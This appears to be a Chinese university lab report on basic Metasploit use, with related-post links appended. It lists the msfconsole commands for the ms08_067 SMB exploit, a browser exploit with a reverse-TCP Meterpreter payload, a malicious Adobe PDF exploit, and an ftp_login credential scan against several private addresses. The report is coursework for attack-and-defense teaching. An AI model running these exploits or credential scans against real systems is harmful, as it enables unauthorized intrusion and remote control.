20155235 《网络攻防》 实验五 MSF基础应用

实验内容

  1. 一个主动攻击实践,如ms08_067; (1分)
  2. 一个针对浏览器的攻击,如ms11_050;(1分)
  3. 一个针对客户端的攻击,如Adobe;(1分)
  4. 成功应用任何一个辅助模块。(0.5分)

    实验一 主动攻击

  • 在kali的终端输入msfconsole,进入控制台
  • 输入use exploit/windows/smb/ms08_067_netapi
  • 输入set RHOST 192.168.129.134,为靶机IP
  • 输入set LHOST 192.168.129.133,为攻击者IP
  • 输入set target 0,设置目标
  • 最后输入exploit,开始攻击。

    实验结果:获取靶机权限

    实验二 针对浏览器的攻击

  • 在kali的终端输入msfconsole,进入控制台
  • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader,获取并使用浏览器漏洞
  • 输入set payload windows/meterpreter/reverse_tcp, 选择反向链接载荷
  • 输入set SRVHOST 192.168.129.133,设置服务器主机IP
  • 输入set LHOST 192.168.129.133,设置攻击机的IP
  • 输入exploit,得到http://192.168.129.133:80/
  • 在靶机上访问http://192.168.129.133:80/,会弹出一个窗口
  • 同时攻击者电脑获取连接,输入sessions查看到反弹链接到主机的电脑
  • 输入sessions -i 2控制靶机

    实验三 针对客户端的攻击

  • 输入exploit/windows/fileformat/adobe_cooltype_sing,确定攻击方案
  • 输入set LHOST 192.168.129.133,设置攻击机的IP
  • 输入set LPORT 5235,设置攻击端口
  • 将生成的pdf传送到靶机上打开,同时在kali上开始监听

    实验四 应用一个辅助模块

  • 输入show auxiliary查看所有辅助模块
  • 使用scanner/http/dir_scanner扫描目录
  • 选择ftp_login,扫描192.168.3.44192.168.43.48五个中,使用用户名20151124(我随手瞎打的),密码为123456登陆的人



    实验结果:失算了!居然没有!

    问题

  1. 用自己的话解释什么是exploit,payload,encode.
    exploit就是利用啊,找到漏洞然后利用!
    payload载荷,就是个载体,让我们能把病毒放进去传到别人电脑里的载体
    encode加密,为了不让我们的病毒被检测到的加密方法

实验心得

从第四次试验开始,我就有了一个安内存条的想法,到这个实验,这个想法终于生根发芽了,我要安一个8G的内存条!!!!!不然虚拟机都打不开,不是搞笑呢吗!

20155235 《网络攻防》 实验五 MSF基础应用的更多相关文章

  1. 20155201 网络攻防技术 实验五 MSF基础应用

    20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...

  2. 20155328 网络攻防 实验五:MSF基础应用

    20155328 网络攻防 实验五:MSF基础应用 实践内容及过程记录 一.Windows服务渗透攻击----ms08_067 攻击机:kali 靶机:WindowsXP(英文版) 第一步,分别查看攻 ...

  3. 2017-2018-2 20155225《网络对抗技术》实验五 MSF基础应用

    2017-2018-2 20155225<网络对抗技术>实验五 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 找到了对应的攻击模块expl ...

  4. 20155313 杨瀚 《网络对抗技术》实验五 MSF基础应用

    20155313 杨瀚 <网络对抗技术>实验五 MSF基础应用 一.实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动 ...

  5. 20145236《网络攻防》Exp5 MSF基础应用

    20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...

  6. 20155226《网络攻防》 Exp5 MSF基础应用

    20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...

  7. 20155301 《网络攻防》 Exp5 MSF基础应用

    20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...

  8. 20155318 《网络攻防》Exp5 MSF基础应用

    20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...

  9. 20155321 《网络攻防》 Exp5 MSF基础应用

    20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...

随机推荐

  1. Python 排错UnicodeEncodeError 'ascii' codec can't encode character 错误解决方法

    Python UnicodeEncodeError 'ascii' codec can't encode character 错误解决方法   by:授客 QQ:1033553122 错误描述: py ...

  2. 解决JBoss只能通过localhost访问不能通过IP的问题

    前序 现在EJB是真的有点落伍了么,网上找点资料都挺难的样子,而且都是很久的了..好吧,最近对EJB有点兴趣学习一下,结果下载到服务器启动后,居然不能直接通过服务器IP访问,也是醉了,默认只能通过本地 ...

  3. python容错

    #try: except: else: #为什么叫容错呢,先说说错误,这里说的错误并不是因为马虎或者什么原因在脚本中留下的bug,这个不能容掉,所谓容掉就是略过这个错误,要在测试时候发现并修正,需要容 ...

  4. python基础学习15----异常处理

    异常处理,是编程语言或计算机硬件里的一种机制,用于处理软件或信息系统中出现的异常状况(即超出程序正常执行流程的某些特殊条件). 1.异常的类型 异常的类型多种多样,常见的异常有: AttributeE ...

  5. The 10 Best Neighborhoods in Seattle

    https://www.seattlemet.com/articles/2015/4/24/the-10-best-neighborhoods-in-seattle-may-2015 By Darre ...

  6. FinalShell使用---Xshell的良心国产软件

    最近发现了一款同类产品FinalShell,还是一块良心国货.初步体验了一下,确实是良心之作.且免费(通用版),支持国货. FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还 ...

  7. pychram使用技巧

    1.代码添加断点 点击对应行代码,按ctrl+F8,即可添加断点 2.查看内置函数的源码 点击对应函数后按crtl+B

  8. yum 私有仓库

    参考地址:https://blog.oldboyedu.com/autodeploy-yum YUM主要用于自动安装.升级rpm软件包,它能自动查找并解决rpm包之间的依赖关系.要成功的使用YUM工具 ...

  9. unity StrangeIoc

    已经很久没有写博客,主要原因还是自我荒废了太久,在学习上失去了动力.最近来新的公司实习,以前都是做项目的开发,现在被调到框架组,主要从事的是框架维护还有开发.学习了许多新的知识还有优秀的框架,今天就写 ...

  10. [python]通过uiautomator实现返回当前程序包名

    # -*- coding: utf-8 -*- from uiautomator import device as d def getCurrentPackageName(): info = d.in ...